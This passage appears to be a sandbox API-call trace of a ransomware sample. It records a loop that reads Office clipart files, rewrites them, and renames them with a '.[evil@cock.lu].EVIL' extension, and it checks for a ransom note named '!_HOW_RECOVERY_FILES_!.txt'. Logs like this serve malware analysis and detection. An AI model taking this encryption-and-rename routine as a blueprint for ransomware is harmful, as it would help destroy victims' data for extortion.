wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 0x45 [0142.339] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.341] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4054, lpOverlapped=0x0) returned 1 [0144.122] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.122] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.122] _errno () returned 0x84b1160840 [0144.122] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.122] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4060, lpOverlapped=0x0) returned 1 [0144.176] CloseHandle (hObject=0x1a8) returned 1 [0144.242] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.242] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.243] __uncaught_exception () returned 0x84b1160800 [0144.243] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.246] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107490.wmf.[evil@cock.lu].evil")) returned 1 [0144.248] ??_V@YAXPEAX@Z () returned 0x1 [0144.257] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF", dwFileAttributes=0x200) returned 0 [0144.258] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.259] wcsstr (_Str="J0107492.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.259] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 69 [0144.259] wcscmp (_String1="J0107492.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.264] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107492.WMF") returned 0x0 [0144.264] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 0x45 [0144.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.266] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1acc, lpOverlapped=0x0) returned 1 [0144.298] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.299] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.299] _errno () returned 0x84b1160840 [0144.299] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.299] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ae0, lpOverlapped=0x0) returned 1 [0144.299] CloseHandle (hObject=0x1a8) returned 1 [0144.299] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.299] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.300] __uncaught_exception () returned 0x84b1160800 [0144.300] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.300] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf.[evil@cock.lu].evil")) returned 1 [0144.301] ??_V@YAXPEAX@Z () returned 0x1 [0144.304] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF", dwFileAttributes=0x200) returned 0 [0144.304] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.304] wcsstr (_Str="J0107494.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.304] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 69 [0144.304] wcscmp (_String1="J0107494.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.304] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107494.WMF") returned 0x0 [0144.304] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 0x45 [0144.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.306] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1918, lpOverlapped=0x0) returned 1 [0144.414] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.414] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.414] _errno () returned 0x84b1160840 [0144.414] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.414] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1920, lpOverlapped=0x0) returned 1 [0144.414] CloseHandle (hObject=0x1a8) returned 1 [0144.414] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.415] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.415] __uncaught_exception () returned 0x84b1160800 [0144.415] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.416] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf.[evil@cock.lu].evil")) returned 1 [0144.420] ??_V@YAXPEAX@Z () returned 0x1 [0144.425] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF", dwFileAttributes=0x200) returned 0 [0144.425] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.425] wcsstr (_Str="J0107496.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.425] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 69 [0144.425] wcscmp (_String1="J0107496.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.425] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107496.WMF") returned 0x0 [0144.425] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF") returned 0x45 [0144.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.430] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x22a0, lpOverlapped=0x0) returned 1 [0144.454] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.454] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.454] _errno () returned 0x84b1160840 [0144.454] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.454] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x22c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x22c0, lpOverlapped=0x0) returned 1 [0144.455] CloseHandle (hObject=0x1a8) returned 1 [0144.455] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.455] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.455] __uncaught_exception () returned 0x84b1160800 [0144.455] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.455] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf.[evil@cock.lu].evil")) returned 1 [0144.456] ??_V@YAXPEAX@Z () returned 0x1 [0144.459] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF", dwFileAttributes=0x200) returned 0 [0144.459] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.459] wcsstr (_Str="J0107500.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.459] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 69 [0144.459] wcscmp (_String1="J0107500.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.459] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107500.WMF") returned 0x0 [0144.459] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF") returned 0x45 [0144.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.461] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1068, lpOverlapped=0x0) returned 1 [0144.465] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.465] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.465] _errno () returned 0x84b1160840 [0144.465] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.465] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1080, lpOverlapped=0x0) returned 1 [0144.465] CloseHandle (hObject=0x1a8) returned 1 [0144.465] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.465] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.465] __uncaught_exception () returned 0x84b1160800 [0144.465] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.466] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf.[evil@cock.lu].evil")) returned 1 [0144.467] ??_V@YAXPEAX@Z () returned 0x1 [0144.470] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF", dwFileAttributes=0x200) returned 0 [0144.470] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.470] wcsstr (_Str="J0107502.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.470] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 69 [0144.470] wcscmp (_String1="J0107502.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.471] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107502.WMF") returned 0x0 [0144.471] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF") returned 0x45 [0144.471] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.472] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a54, lpOverlapped=0x0) returned 1 [0144.586] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.586] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.586] _errno () returned 0x84b1160840 [0144.586] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.586] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a60, lpOverlapped=0x0) returned 1 [0144.628] CloseHandle (hObject=0x1a8) returned 1 [0144.628] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.628] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.629] __uncaught_exception () returned 0x84b1160800 [0144.629] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.629] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf.[evil@cock.lu].evil")) returned 1 [0144.630] ??_V@YAXPEAX@Z () returned 0x1 [0144.632] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF", dwFileAttributes=0x200) returned 0 [0144.632] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.632] wcsstr (_Str="J0107512.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.632] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 69 [0144.632] wcscmp (_String1="J0107512.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.633] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107512.WMF") returned 0x0 [0144.633] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 0x45 [0144.633] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.634] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c8c, lpOverlapped=0x0) returned 1 [0144.637] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.637] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.637] _errno () returned 0x84b1160840 [0144.637] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.637] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ca0, lpOverlapped=0x0) returned 1 [0144.637] CloseHandle (hObject=0x1a8) returned 1 [0144.637] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.637] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.638] __uncaught_exception () returned 0x84b1160800 [0144.638] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.638] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf.[evil@cock.lu].evil")) returned 1 [0144.639] ??_V@YAXPEAX@Z () returned 0x1 [0144.641] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF", dwFileAttributes=0x200) returned 0 [0144.642] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.642] wcsstr (_Str="J0107514.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.642] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 69 [0144.642] wcscmp (_String1="J0107514.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.642] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107514.WMF") returned 0x0 [0144.642] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 0x45 [0144.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.643] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2fac, lpOverlapped=0x0) returned 1 [0144.763] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.763] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.763] _errno () returned 0x84b1160840 [0144.763] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.763] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2fc0, lpOverlapped=0x0) returned 1 [0144.763] CloseHandle (hObject=0x1a8) returned 1 [0144.763] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.763] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.763] __uncaught_exception () returned 0x84b1160800 [0144.763] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.764] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf.[evil@cock.lu].evil")) returned 1 [0144.764] ??_V@YAXPEAX@Z () returned 0x1 [0144.767] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF", dwFileAttributes=0x200) returned 0 [0144.767] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.767] wcsstr (_Str="J0107516.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.767] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 69 [0144.767] wcscmp (_String1="J0107516.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.767] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107516.WMF") returned 0x0 [0144.767] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 0x45 [0144.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.770] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, 